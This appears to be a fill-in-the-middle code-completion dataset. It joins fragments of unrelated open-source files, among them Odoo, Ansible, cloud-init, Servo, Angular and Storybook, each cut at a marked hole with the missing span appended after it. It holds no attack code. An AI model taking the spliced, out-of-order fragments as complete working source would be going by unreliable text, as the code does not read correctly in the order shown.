etree.SubElement(etree.SubElement(root, 'h2'), 'a') link.attrib['href'] = board_link link.text = _('My Alerts') for data_title, data in data_list: frame = etree.SubElement(root, 'div') frame.attrib['style'] = ( 'border: 1px solid LightGray;' 'margin-top: 8px;' 'padding: 8px;' ) title = etree.SubElement(frame, 'h3') title.text = data_title or u'' table = etree.SubElement(frame, 'table') table.attrib['style'] = ( 'border-collapse: collapse;' 'border-spacing: 2px;' ) first_record = True for record in data: row = etree.SubElement(table, 'tr') if first_record: first_record = False row.attrib['style'] = ( 'background-color: LightGray;' 'font-weight: bolder;' ) for field in record: cell = etree.SubElement(row, 'td') cell.attrib['style'] = 'padding: 3px 6px;' cell.text = field return etree.tostring(root, pretty_print=True) def _default_context(self, cr, uid, context): """Get an Odoo context, adapted to the specified user. Contains additional values the "_format_content" function expects. """ ret = context.copy() lang_obj = self.pool['res.lang'] user = self.browse(cr, SUPERUSER_ID, [uid], context=context)[0] # The user object only has a "lang" selection key; find the actual # language object. lang_ids = lang_obj.search( cr, SUPERUSER_ID, [('code', '=', user.lang)], limit=1, context=context ) if not lang_ids: raise exceptions.Warning(_('Lang %s not found') % user.lang) lang = lang_obj.browse(cr, SUPERUSER_ID, lang_ids, context=context)[0] ret.update({ 'date_format': lang.date_format, 'datetime_format': '%s %s' % (lang.date_format, lang.time_format), 'lang': user.lang, 'tz': user.tz, 'uid': uid, }) return ret def _format_content(self, content, field_info, context): """Stringify the specified field value, taking care of translations and fetching related names. @type content: Odoo browse-record object. @param field_info: Odoo field information. @param context: Odoo context; must define the following: * date_format. * datetime_format. @rtype: String. """ # Delegate to per-type functions. return getattr( self, '_format_content_%s' % field_info['type'], lambda content, *args: str(content) )( content, field_info, context ) def _format_content_boolean(self, content, field_info, context): return _('Yes') if content else _('No') def _format_content_char(self, content, field_info, context): return content or '' def _format_content_date(self, content, field_info, context): if not content: return '' return ( datetime.datetime.strptime(content, DEFAULT_SERVER_DATE_FORMAT) .strftime(context['date_format']) ) def _format_content_datetime(self, content, field_info, context): if not content: return '' return ( datetime.datetime.strptime(content, DEFAULT_SERVER_DATETIME_FORMAT) .strftime(context['datetime_format']) ) def _format_content_float(self, content, field_info, context): # TODO Better float formatting (see report_sxw:digits_fmt, # report_sxw:get_digits for details. return str(content or 0.0) def _format_content_integer(self, content, field_info, context): return str(content or 0) def _format_content_many2many(self, content, field_info, context): if not content: return '' # TODO Simplify the following when a method can be executed on a # "browse_record_list" object (see the TODO near its declaration). return ', '.join( self._get_object_name(linked_content, context) for linked_content in content ) def _format_content_one2many(self, content, field_info, context): if not content: return '' # TODO Simplify the following when a method can be executed on a # "browse_record_list" object (see the TODO near its declaration). return ', '.join( self._get_object_name(linked_content, context) for linked_content in content ) def _format_content_selection(self, content, field_info, context): if not content: return '' return dict(field_info['selection']).get(content, '') def _format_content_many2one(self, content, field_info, context): if not content: return '' return self._get_object_name(content, context) def _format_content_text(self, content, field_info, context): return content or '' def _get_object_name(self, content, context): """Call the "name_get" function of the specified Odoo browse-record object. The "context" parameter is here to ensure proper translations. """ # 0: first element of the returned list. # 1: second element of the (ID, name) tuple. return content.name_get()[0][1]<|fim▁end|>
<|file_name|>NativeModule.ts<|end_file_name|><|fim▁begin|>/// <reference path="emscripten.d.ts" /> /// <reference path="libvorbis.asmjs.d.ts" /> /// <reference path="../typings/es6-promise/es6-promise.d.ts" /> module libvorbis { export function makeRawNativeModule(options?: emscripten.EmscriptenModuleOptions) { return new Promise<emscripten.EmscriptenModule>((resolve, reject) => {<|fim▁hole|><|fim▁end|>
_makeRawNativeModule(options, resolve); }); } }
<|file_name|>NoteTwoTone.js<|end_file_name|><|fim▁begin|>"use strict"; var _interopRequireDefault = require("@babel/runtime/helpers/interopRequireDefault"); Object.defineProperty(exports, "__esModule", { value: true }); exports.default = void 0; var _createSvgIcon = _interopRequireDefault(require("./utils/createSvgIcon")); var _jsxRuntime = require("react/jsx-runtime"); var _default = (0, _createSvgIcon.default)([/*#__PURE__*/(0, _jsxRuntime.jsx)("path", {<|fim▁hole|> opacity: ".3" }, "0"), /*#__PURE__*/(0, _jsxRuntime.jsx)("path", { d: "M4 4c-1.1 0-2 .9-2 2v12.01c0 1.1.9 1.99 2 1.99h16c1.1 0 2-.9 2-2v-8l-6-6H4zm16 14.01H4V6h11v5h5v7.01z" }, "1")], 'NoteTwoTone'); exports.default = _default;<|fim▁end|>
d: "M15 6H4v12.01h16V11h-5z",
<|file_name|>ListEdgePoliciesInput.java<|end_file_name|><|fim▁begin|>/** * Copyright (c) Microsoft Corporation. All rights reserved. * Licensed under the MIT License. See License.txt in the project root for * license information. * * Code generated by Microsoft (R) AutoRest Code Generator. */ package com.microsoft.azure.management.mediaservices.v2018_07_01; import com.fasterxml.jackson.annotation.JsonProperty; /** * The ListEdgePoliciesInput model. */ public class ListEdgePoliciesInput {<|fim▁hole|> * Unique identifier of the edge device. */ @JsonProperty(value = "deviceId") private String deviceId; /** * Get unique identifier of the edge device. * * @return the deviceId value */ public String deviceId() { return this.deviceId; } /** * Set unique identifier of the edge device. * * @param deviceId the deviceId value to set * @return the ListEdgePoliciesInput object itself. */ public ListEdgePoliciesInput withDeviceId(String deviceId) { this.deviceId = deviceId; return this; } }<|fim▁end|>
/**
<|file_name|>tahoe_mkdir.py<|end_file_name|><|fim▁begin|>import urllib from allmydata.scripts.common_http import do_http, check_http_error from allmydata.scripts.common import get_alias, DEFAULT_ALIAS, UnknownAliasError from allmydata.util.encodingutil import quote_output def mkdir(options): nodeurl = options['node-url'] aliases = options.aliases where = options.where stdout = options.stdout stderr = options.stderr if not nodeurl.endswith("/"): nodeurl += "/" if where: try: rootcap, path = get_alias(aliases, where, DEFAULT_ALIAS) except UnknownAliasError, e: e.display(stderr)<|fim▁hole|> # create a new unlinked directory url = nodeurl + "uri?t=mkdir" if options["format"]: url += "&format=%s" % urllib.quote(options['format']) resp = do_http("POST", url) rc = check_http_error(resp, stderr) if rc: return rc new_uri = resp.read().strip() # emit its write-cap print >>stdout, quote_output(new_uri, quotemarks=False) return 0 # create a new directory at the given location if path.endswith("/"): path = path[:-1] # path must be "/".join([s.encode("utf-8") for s in segments]) url = nodeurl + "uri/%s/%s?t=mkdir" % (urllib.quote(rootcap), urllib.quote(path)) if options['format']: url += "&format=%s" % urllib.quote(options['format']) resp = do_http("POST", url) check_http_error(resp, stderr) new_uri = resp.read().strip() print >>stdout, quote_output(new_uri, quotemarks=False) return 0<|fim▁end|>
return 1 if not where or not path:
<|file_name|>obli.js<|end_file_name|><|fim▁begin|>module.exports = {<|fim▁hole|> }, trade: function(player, npc){ vendor("Obli's General Store"); } }<|fim▁end|>
talkTo: function(player, npc){ // TODO: Dialogues this.trade(player, npc);
<|file_name|>TableComplexityCheckTest.java<|end_file_name|><|fim▁begin|>/* * SonarQube Lua Plugin * Copyright (C) 2016 * mailto:fati.ahmadi AT gmail DOT com * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 3 of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public License * along with this program; if not, write to the Free Software Foundation, * Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package org.sonar.lua.checks; import org.junit.Test; import org.sonar.lua.LuaAstScanner; import org.sonar.squidbridge.api.SourceFile; import org.sonar.squidbridge.checks.CheckMessagesVerifier; import org.sonar.squidbridge.api.SourceFunction; import java.io.File; public class TableComplexityCheckTest { @Test public void test() { TableComplexityCheck check = new TableComplexityCheck(); check.setMaximumTableComplexityThreshold(0); SourceFile file = LuaAstScanner.scanSingleFile(new File("src/test/resources/checks/tableComplexity.lua"), check);<|fim▁hole|> .next().atLine(1).withMessage("Table has a complexity of 1 which is greater than 0 authorized.") .noMore(); } }<|fim▁end|>
CheckMessagesVerifier.verify(file.getCheckMessages())
<|file_name|>pixel_data_range.py<|end_file_name|><|fim▁begin|>'''OpenGL extension NV.pixel_data_range This module customises the behaviour of the OpenGL.raw.GL.NV.pixel_data_range to provide a more Python-friendly API Overview (from the spec) The vertex array range extension is intended to improve the efficiency of OpenGL vertex arrays. OpenGL vertex arrays' coherency model and ability to access memory from arbitrary locations in memory prevented implementations from using DMA (Direct Memory Access) operations. Many image-intensive applications, such as those that use dynamically generated textures, face similar problems. These applications would like to be able to sustain throughputs of hundreds of millions of pixels per second through DrawPixels and hundreds of millions of texels per second through TexSubImage. However, the same restrictions that limited vertex throughput also limit pixel throughput. By the time that any pixel operation that reads data from user memory returns, OpenGL requires that it must be safe for the application to start using that memory for a different purpose. This coherency model prevents asynchronous DMA transfers directly out of the user's<|fim▁hole|> There are also no restrictions on the pointer provided to pixel operations or on the size of the data. To facilitate DMA implementations, the driver needs to know in advance what region of the address space to lock down. Vertex arrays faced both of these restrictions already, but pixel operations have one additional complicating factor -- they are bidirectional. Vertex array data is always being transfered from the application to the driver and the HW, whereas pixel operations sometimes transfer data to the application from the driver and HW. Note that the types of memory that are suitable for DMA for reading and writing purposes are often different. For example, on many PC platforms, DMA pulling is best accomplished with write-combined (uncached) AGP memory, while pushing data should use cached memory so that the application can read the data efficiently once it has been read back over the AGP bus. This extension defines an API where an application can specify two pixel data ranges, which are analogous to vertex array ranges, except that one is for operations where the application is reading data (e.g. glReadPixels) and one is for operations where the application is writing data (e.g. glDrawPixels, glTexSubImage2D, etc.). Each pixel data range has a pointer to its start and a length in bytes. When the pixel data range is enabled, and if the pointer specified as the argument to a pixel operation is inside the corresponding pixel data range, the implementation may choose to asynchronously pull data from the pixel data range or push data to the pixel data range. Data pulled from outside the pixel data range is undefined, while pushing data to outside the pixel data range produces undefined results. The application may synchronize with the hardware in one of two ways: by flushing the pixel data range (or causing an implicit flush) or by using the NV_fence extension to insert fences in the command stream. The official definition of this extension is available here: http://www.opengl.org/registry/specs/NV/pixel_data_range.txt ''' from OpenGL import platform, constants, constant, arrays from OpenGL import extensions, wrapper from OpenGL.GL import glget import ctypes from OpenGL.raw.GL.NV.pixel_data_range import * ### END AUTOGENERATED SECTION<|fim▁end|>
buffer.
<|file_name|>sf_account_manager.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python # (c) 2017, NetApp, Inc # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' module: sf_account_manager short_description: Manage SolidFire accounts extends_documentation_fragment: - netapp.solidfire version_added: '2.3' author: Sumit Kumar ([email protected]) description: - Create, destroy, or update accounts on SolidFire options: state: description: - Whether the specified account should exist or not. required: true choices: ['present', 'absent'] name: description: - Unique username for this account. (May be 1 to 64 characters in length). required: true new_name: description: - New name for the user account. required: false default: None initiator_secret: description: - CHAP secret to use for the initiator. Should be 12-16 characters long and impenetrable. - The CHAP initiator secrets must be unique and cannot be the same as the target CHAP secret. - If not specified, a random secret is created. required: false target_secret: description: - CHAP secret to use for the target (mutual CHAP authentication). - Should be 12-16 characters long and impenetrable. - The CHAP target secrets must be unique and cannot be the same as the initiator CHAP secret. - If not specified, a random secret is created. required: false attributes: description: List of Name/Value pairs in JSON object format. required: false account_id: description: - The ID of the account to manage or update. required: false default: None status: description: - Status of the account. required: false ''' EXAMPLES = """ - name: Create Account<|fim▁hole|> hostname: "{{ solidfire_hostname }}" username: "{{ solidfire_username }}" password: "{{ solidfire_password }}" state: present name: TenantA - name: Modify Account sf_account_manager: hostname: "{{ solidfire_hostname }}" username: "{{ solidfire_username }}" password: "{{ solidfire_password }}" state: present name: TenantA new_name: TenantA-Renamed - name: Delete Account sf_account_manager: hostname: "{{ solidfire_hostname }}" username: "{{ solidfire_username }}" password: "{{ solidfire_password }}" state: absent name: TenantA-Renamed """ RETURN = """ """ import traceback from ansible.module_utils.basic import AnsibleModule from ansible.module_utils._text import to_native import ansible.module_utils.netapp as netapp_utils HAS_SF_SDK = netapp_utils.has_sf_sdk() class SolidFireAccount(object): def __init__(self): self.argument_spec = netapp_utils.ontap_sf_host_argument_spec() self.argument_spec.update(dict( state=dict(required=True, choices=['present', 'absent']), name=dict(required=True, type='str'), account_id=dict(required=False, type='int', default=None), new_name=dict(required=False, type='str', default=None), initiator_secret=dict(required=False, type='str'), target_secret=dict(required=False, type='str'), attributes=dict(required=False, type='dict'), status=dict(required=False, type='str'), )) self.module = AnsibleModule( argument_spec=self.argument_spec, supports_check_mode=True ) p = self.module.params # set up state variables self.state = p['state'] self.name = p['name'] self.account_id = p['account_id'] self.new_name = p['new_name'] self.initiator_secret = p['initiator_secret'] self.target_secret = p['target_secret'] self.attributes = p['attributes'] self.status = p['status'] if HAS_SF_SDK is False: self.module.fail_json(msg="Unable to import the SolidFire Python SDK") else: self.sfe = netapp_utils.create_sf_connection(module=self.module) def get_account(self): """ Return account object if found :return: Details about the account. None if not found. :rtype: dict """ account_list = self.sfe.list_accounts() for account in account_list.accounts: if account.username == self.name: # Update self.account_id: if self.account_id is not None: if account.account_id == self.account_id: return account else: self.account_id = account.account_id return account return None def create_account(self): try: self.sfe.add_account(username=self.name, initiator_secret=self.initiator_secret, target_secret=self.target_secret, attributes=self.attributes) except Exception as e: self.module.fail_json(msg='Error creating account %s: %s)' % (self.name, to_native(e)), exception=traceback.format_exc()) def delete_account(self): try: self.sfe.remove_account(account_id=self.account_id) except Exception as e: self.module.fail_json(msg='Error deleting account %s: %s' % (self.account_id, to_native(e)), exception=traceback.format_exc()) def update_account(self): try: self.sfe.modify_account(account_id=self.account_id, username=self.new_name, status=self.status, initiator_secret=self.initiator_secret, target_secret=self.target_secret, attributes=self.attributes) except Exception as e: self.module.fail_json(msg='Error updating account %s: %s' % (self.account_id, to_native(e)), exception=traceback.format_exc()) def apply(self): changed = False account_exists = False update_account = False account_detail = self.get_account() if account_detail: account_exists = True if self.state == 'absent': changed = True elif self.state == 'present': # Check if we need to update the account if account_detail.username is not None and self.new_name is not None and \ account_detail.username != self.new_name: update_account = True changed = True elif account_detail.status is not None and self.status is not None \ and account_detail.status != self.status: update_account = True changed = True elif account_detail.initiator_secret is not None and self.initiator_secret is not None \ and account_detail.initiator_secret != self.initiator_secret: update_account = True changed = True elif account_detail.target_secret is not None and self.target_secret is not None \ and account_detail.target_secret != self.target_secret: update_account = True changed = True elif account_detail.attributes is not None and self.attributes is not None \ and account_detail.attributes != self.attributes: update_account = True changed = True else: if self.state == 'present': changed = True if changed: if self.module.check_mode: pass else: if self.state == 'present': if not account_exists: self.create_account() elif update_account: self.update_account() elif self.state == 'absent': self.delete_account() self.module.exit_json(changed=changed) def main(): v = SolidFireAccount() v.apply() if __name__ == '__main__': main()<|fim▁end|>
sf_account_manager:
<|file_name|>wrapper.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ use core::nonzero::NonZero; use dom::bindings::js::{MutNullableJS, Root}; use dom::bindings::reflector::DomObject; use dom::bindings::trace::JSTraceable; use dom::webglrenderingcontext::WebGLRenderingContext; use heapsize::HeapSizeOf; use js::jsapi::JSObject; use std::any::Any; use super::{WebGLExtension, WebGLExtensions}; /// Trait used internally by WebGLExtensions to store and /// handle the different WebGL extensions in a common list. pub trait WebGLExtensionWrapper: JSTraceable + HeapSizeOf { fn instance_or_init(&self, ctx: &WebGLRenderingContext, ext: &WebGLExtensions) -> NonZero<*mut JSObject>; fn is_supported(&self, &WebGLExtensions) -> bool; fn is_enabled(&self) -> bool; fn enable(&self, ext: &WebGLExtensions); fn name(&self) -> &'static str; fn as_any(&self) -> &Any; } #[must_root] #[derive(HeapSizeOf, JSTraceable)] pub struct TypedWebGLExtensionWrapper<T: WebGLExtension> { extension: MutNullableJS<T::Extension> } /// Typed WebGL Extension implementation. /// Exposes the exact MutNullableJS<DOMObject> type defined by the extension. impl<T: WebGLExtension> TypedWebGLExtensionWrapper<T> { pub fn new() -> TypedWebGLExtensionWrapper<T> { TypedWebGLExtensionWrapper { extension: MutNullableJS::new(None) } }<|fim▁hole|>} impl<T> WebGLExtensionWrapper for TypedWebGLExtensionWrapper<T> where T: WebGLExtension + JSTraceable + HeapSizeOf + 'static { #[allow(unsafe_code)] fn instance_or_init(&self, ctx: &WebGLRenderingContext, ext: &WebGLExtensions) -> NonZero<*mut JSObject> { let mut enabled = true; let extension = self.extension.or_init(|| { enabled = false; T::new(ctx) }); if !enabled { self.enable(ext); } unsafe { NonZero::new_unchecked(extension.reflector().get_jsobject().get()) } } fn is_supported(&self, ext: &WebGLExtensions) -> bool { self.is_enabled() || T::is_supported(ext) } fn is_enabled(&self) -> bool { self.extension.get().is_some() } fn enable(&self, ext: &WebGLExtensions) { T::enable(ext); } fn name(&self) -> &'static str { T::name() } fn as_any<'a>(&'a self) -> &'a Any { self } } impl<T> TypedWebGLExtensionWrapper<T> where T: WebGLExtension + JSTraceable + HeapSizeOf + 'static { pub fn dom_object(&self) -> Option<Root<T::Extension>> { self.extension.get() } }<|fim▁end|>
<|file_name|>buildsettings.py<|end_file_name|><|fim▁begin|># settings file for builds. # if you want to have custom builds, copy this file to "localbuildsettings.py" and make changes there. # possible fields: # resourceBaseUrl - optional - the URL base for external resources (all resources embedded in standard IITC) # distUrlBase - optional - the base URL to use for update checks # buildMobile - optional - if set, mobile builds are built with 'ant'. requires the Android SDK and appropriate mobile/local.properties file configured # preBuild - optional - an array of strings to run as commands, via os.system, before building the scripts # postBuild - optional - an array of string to run as commands, via os.system, after all builds are complete buildSettings = { # local: use this build if you're not modifying external resources # no external resources allowed - they're not needed any more 'local': {<|fim▁hole|> }, # local8000: if you need to modify external resources, this build will load them from # the web server at http://0.0.0.0:8000/dist # (This shouldn't be required any more - all resources are embedded. but, it remains just in case some new feature # needs external resources) 'local8000': { 'resourceUrlBase': 'http://0.0.0.0:8000/dist', 'distUrlBase': None, }, # mobile: default entry that also builds the mobile .apk # you will need to have the android-sdk installed, and the file mobile/local.properties created as required 'mobile': { 'resourceUrlBase': None, 'distUrlBase': None, 'buildMobile': 'debug', }, # if you want to publish your own fork of the project, and host it on your own web site # create a localbuildsettings.py file containing something similar to this # note: Firefox+Greasemonkey require the distUrlBase to be "https" - they won't check for updates on regular "http" URLs #'example': { # 'resourceBaseUrl': 'http://www.example.com/iitc/dist', # 'distUrlBase': 'https://secure.example.com/iitc/dist', #}, } # defaultBuild - the name of the default build to use if none is specified on the build.py command line # (in here as an example - it only works in localbuildsettings.py) #defaultBuild = 'local'<|fim▁end|>
'resourceUrlBase': 'http://localhost:8100', 'distUrlBase': 'http://localhost:8100',
<|file_name|>ConfigHelper.java<|end_file_name|><|fim▁begin|>package net.joaopms.PvPUtilities.helper; import net.minecraftforge.common.config.Configuration; import java.io.File; public class ConfigHelper { private static Configuration config; public static void init(File file) { config = new Configuration(file, true); config.load(); initConfig(); config.save(); } public static Configuration getConfig() { return config; } private static void initConfig() { config.get("overcastStatistics", "showOvercastLogo", true); config.get("overcastStatistics", "showKills", true); config.get("overcastStatistics", "showDeaths", true); config.get("overcastStatistics", "showFriends", false); config.get("overcastStatistics", "showKD", true); config.get("overcastStatistics", "showKK", false); config.get("overcastStatistics", "showServerJoins", false); config.get("overcastStatistics", "showDaysPlayed", false); config.get("overcastStatistics", "showRaindrops", false); <|fim▁hole|>}<|fim▁end|>
config.get("overcastStatistics", "overlayOpacity", 0.5F); }
<|file_name|>services.component.ts<|end_file_name|><|fim▁begin|>import { Component, OnInit } from '@angular/core'; @Component({ selector: 'sky-services', template: ` <div id="services" class="container-fluid py-5"> <div class="row row align-items-start justify-content-center"> <div class="col col-lg-4 col-md-6 col-sm-12" *ngFor="let service of services"> <div class="card text-center p-3 no-border"> <div class="card-body"> <h4 class="card-title"> <i class="icon {{service.icon}}"></i> <span class="ml-2">{{service.title}}</span> </h4> <p class="card-text">{{service.description}}</p> </div> </div> </div> </div> </div> `, styles: [ '.no-border { border: none; }' ] }) export class ServicesComponent implements OnInit { services: any[]; constructor() { } ngOnInit() { this.services = [ { icon: 'ion-coffee', title: 'Consulting',<|fim▁hole|> icon: 'ion-code', title: 'Code Review', description: 'Whether you have recently started your project or are nearly finished, SkyPress will ensure your web application is up to par with proper code and security standards while troubleshooting and debugging any issues.' }, { icon: 'ion-ribbon-b', title: 'Data Best Practices', description: 'Properly structured data models are the cornerstones to a successful application. They allow for rapid development throughout the entire project, and reduce the impact that changes will have on your application in the future. SkyPress works with our clients to take a data first approach in the design of their application.' }, { icon: 'ion-cloud', title: 'Scalable Architecture', description: 'Performant code isn’t something that works amazingly well just for yourself, but for yourself plus a million other users at the same time. Focusing on the scalability of your application from the beginning phases of it’s architecture is the most efficient way of ensuring that it is baked into every aspect of it’s development.' }, { icon: 'ion-network', title: 'Business Integrations', description: 'Businesses aren’t operated by a single program. Instead, we use the appropriate services that satisfy your needs. SkyPress can help with the integration of your web application and your existing business tools in order to streamline your daily workflow.' }, { icon: 'ion-fireball', title: 'WAR Framework', description: 'SkyPress is passionate about expanding the capabilities of WordPress and growing the community. We built and released an open source Framework that simplifies the development of web applications built on top of WordPress. As it’s creators and maintainers, we want to help you with the implementation and extension of this powerful solution.' } ]; } }<|fim▁end|>
description: 'SkyPress can assist you in building future proof solutions for your web applications. Being a well known thought leader on WordPress web applications and the creator of the WAR framework, we can work with your team to rapidly develop your idea into a finished product.' }, {
<|file_name|>statefile.go<|end_file_name|><|fim▁begin|>// replication-manager - Replication Manager Monitoring and CLI for MariaDB and MySQL // Authors: Guillaume Lefranc <[email protected]> // Stephane Varoqui <[email protected]> // This source code is licensed under the GNU General Public License, version 3. // Redistribution/Reuse of this code is permitted under the GNU v3 license, as // an additional term, ALL code must carry the original Author(s) credit in comment form. // See LICENSE in this directory for the integral text. package cluster import ( "encoding/binary" "os" ) type stateFile struct { Handle *os.File Name string Count int32 Timestamp int64 } func newStateFile(name string) *stateFile { sf := new(stateFile) sf.Name = name return sf } func (sf *stateFile) access() error { var err error sf.Handle, err = os.OpenFile(sf.Name, os.O_RDWR|os.O_CREATE, 0666) if err != nil { return err } return nil } func (sf *stateFile) write() error { err := sf.Handle.Truncate(0) sf.Handle.Seek(0, 0) if err != nil { return err } err = binary.Write(sf.Handle, binary.LittleEndian, sf.Count) if err != nil { return err } err = binary.Write(sf.Handle, binary.LittleEndian, sf.Timestamp) if err != nil { return err } return nil } func (sf *stateFile) read() error { sf.Handle.Seek(0, 0) err := binary.Read(sf.Handle, binary.LittleEndian, &sf.Count) if err != nil { return err } err = binary.Read(sf.Handle, binary.LittleEndian, &sf.Timestamp) if err != nil { return err } return nil<|fim▁hole|><|fim▁end|>
}
<|file_name|>cc_keys_to_console.py<|end_file_name|><|fim▁begin|># vi: ts=4 expandtab # # Copyright (C) 2011 Canonical Ltd. # Copyright (C) 2012 Hewlett-Packard Development Company, L.P. # # Author: Scott Moser <[email protected]> # Author: Juerg Haefliger <[email protected]> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License version 3, as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import os from cloudinit.settings import PER_INSTANCE from cloudinit import util frequency = PER_INSTANCE # This is a tool that cloud init provides HELPER_TOOL_TPL = '%s/cloud-init/write-ssh-key-fingerprints' def _get_helper_tool_path(distro): try: base_lib = distro.usr_lib_exec except AttributeError: base_lib = '/usr/lib' return HELPER_TOOL_TPL % base_lib def handle(name, cfg, cloud, log, _args): helper_path = _get_helper_tool_path(cloud.distro) if not os.path.exists(helper_path): log.warn(("Unable to activate module %s," " helper tool not found at %s"), name, helper_path) return fp_blacklist = util.get_cfg_option_list(cfg, "ssh_fp_console_blacklist", []) key_blacklist = util.get_cfg_option_list(cfg,<|fim▁hole|> "ssh_key_console_blacklist", ["ssh-dss"]) try: cmd = [helper_path] cmd.append(','.join(fp_blacklist)) cmd.append(','.join(key_blacklist)) (stdout, _stderr) = util.subp(cmd) util.multi_log("%s\n" % (stdout.strip()), stderr=False, console=True) except Exception: log.warn("Writing keys to the system console failed!") raise<|fim▁end|>
<|file_name|>ActionBar.stories.js<|end_file_name|><|fim▁begin|>import React from 'react'; import { action } from '@storybook/addon-actions'; import { Action } from '../Actions'; import ActionBar from './ActionBar.component'; const primary = { label: 'Primary', icon: 'talend-cog', bsStyle: 'primary', 'data-feature': 'actionbar.primary', onClick: action('You clicked me'), }; const actions = { left: [ primary, { label: 'Secondary1', icon: 'talend-cog', 'data-feature': 'actionbar.secondary', onClick: action('You clicked me'), }, { displayMode: ActionBar.DISPLAY_MODES.SPLIT_DROPDOWN, label: 'Secondary3', icon: 'talend-cog', 'data-feature': 'actionbar.splitdropdown', onClick: action('on split button click'), items: [ { label: 'From Local', 'data-feature': 'actionbar.splitdropdown.items', onClick: action('From Local click'), }, { label: 'From Remote', 'data-feature': 'actionbar.splitdropdown.items', onClick: action('From Remote click'), }, ], emptyDropdownLabel: 'No option', }, { id: 'dropdown', displayMode: ActionBar.DISPLAY_MODES.DROPDOWN, label: 'Dropdown', icon: 'talend-cog', items: [ { label: 'From Local', onClick: action('From Local click'), }, { label: 'From Remote', onClick: action('From Remote click'), }, ], }, ], right: [ { label: 'Secondary4', icon: 'talend-upload', displayMode: 'file', onChange: action('You changed me'), }, { label: 'Secondary5', icon: 'talend-cog', onClick: action('You clicked me'), }, ], }; const multi3 = { label: 'multi3', icon: 'talend-cog', onClick: action('You clicked me'), }; const multiSelectActions = { left: [ { label: 'multi1', icon: 'talend-cog', onClick: action('You clicked me'), }, { label: 'multi2', icon: 'talend-cog', onClick: action('You clicked me'), }, ], center: [ { label: 'multi5', icon: 'talend-cog', onClick: action('You clicked me'), }, ], right: [ multi3, { label: 'multi4', icon: 'talend-cog', onClick: action('You clicked me'), }, ], }; const btnGroupActions = { left: [ { displayMode: ActionBar.DISPLAY_MODES.BTN_GROUP, actions: [ { label: 'hidden mean tooltips', icon: 'talend-cog', hideLabel: true, onClick: action('cog'), }, { label: 'you are a super star', icon: 'talend-badge', hideLabel: true, onClick: action('badge'), }, { label: 'but don t click this', icon: 'talend-cross', hideLabel: true, onClick: action('boom'), }, { label: 'edit me', icon: 'talend-pencil', hideLabel: true, onClick: action('oh yes'), }, ], }, { displayMode: ActionBar.DISPLAY_MODES.BTN_GROUP, actions: [ { label: 'you can also add', icon: 'talend-plus-circle', hideLabel: true, onClick: action('add !'), }, { label: 'search', icon: 'talend-search', hideLabel: true, onClick: action('search'), }, { label: 'star', icon: 'talend-star', hideLabel: true, onClick: action('star'), }, ], }, ], center: [ { displayMode: ActionBar.DISPLAY_MODES.BTN_GROUP, actions: [ { label: 'go to dataprep', icon: 'talend-dataprep', hideLabel: true, onClick: action('dataprep'), }, { label: 'go to elastic', icon: 'talend-elastic', hideLabel: true, onClick: action('elastic'), }, { label: 'go to cloud engine', icon: 'talend-cloud-engine', hideLabel: true, onClick: action('cloud-engine'), }, ], }, ], right: [ { displayMode: ActionBar.DISPLAY_MODES.BTN_GROUP, actions: [ { label: 'table', icon: 'talend-table', hideLabel: true, onClick: action('table'), }, { label: 'trash', icon: 'talend-trash', hideLabel: true, onClick: action('trash'), }, ], }, ], }; const basicProps = { actions, multiSelectActions, }; const multiDelete = { label: 'Delete', icon: 'talend-trash', onClick: action('multiple delete'), className: 'btn-icon-text', }; const multiDuplicate = { label: 'Duplicate', icon: 'talend-files-o', onClick: action('multiple duplicate'), className: 'btn-icon-text', }; const multiUpdate = { label: 'Update', icon: 'talend-file-move', onClick: action('multiple update'), className: 'btn-icon-text', }; const multiFavorite = { label: 'Favorite', icon: 'talend-star', onClick: action('multiple favorite'), className: 'btn-icon-text', }; const multiCertify = { label: 'Certify', icon: 'talend-badge', onClick: action('multiple certify'), className: 'btn-icon-text', }; const massActions = { left: [multiDelete, multiDuplicate, multiUpdate], }; const appMassActions = { left: [multiFavorite, multiCertify], }; export default { title: 'Form/Controls/ActionBar', }; export const Default = () => ( <nav> <p>No Selected, Layout: Left Space Right</p> <div id="default"> <ActionBar {...basicProps} selected={0} /> </div> <p>1 Selected, Layout: Left Center Right</p> <div id="selected"> <ActionBar {...basicProps} selected={1} /> </div> <p>1 Selected, Layout: Right</p> <div id="right"> <ActionBar selected={1} actions={{ left: [primary] }} multiSelectActions={{ right: [multi3] }} /> </div> <p>Toolbar with btn-group and only icons/ Layout: left, center, right</p> <div id="btn-group"> <ActionBar actions={btnGroupActions} /> </div> <p>3 items selected, with mass/bulk Actions</p> <div id="mass-actions"> <ActionBar selected={3} multiSelectActions={massActions} appMultiSelectActions={appMassActions} /> </div> </nav> ); export const Custom = () => ( <nav> <div id="default"><|fim▁hole|> <ActionBar.Content tag="button" className="btn btn-default" left> Hello button </ActionBar.Content> <ActionBar.Content left> <Action label="hello Action" icon="talend-trash" onClick={action('onClick')} /> </ActionBar.Content> <ActionBar.Content tag="form" role="search" center> <div className="form-group"> <input type="text" className="form-control" placeholder="Search" /> </div> <button type="submit" className="btn btn-default"> Submit </button> </ActionBar.Content> <ActionBar.Content tag="p" right> Hello paragraph </ActionBar.Content> </ActionBar> </div> </nav> );<|fim▁end|>
<ActionBar> <ActionBar.Content tag="a" left href="#/foo/bar"> Hello anchor </ActionBar.Content>
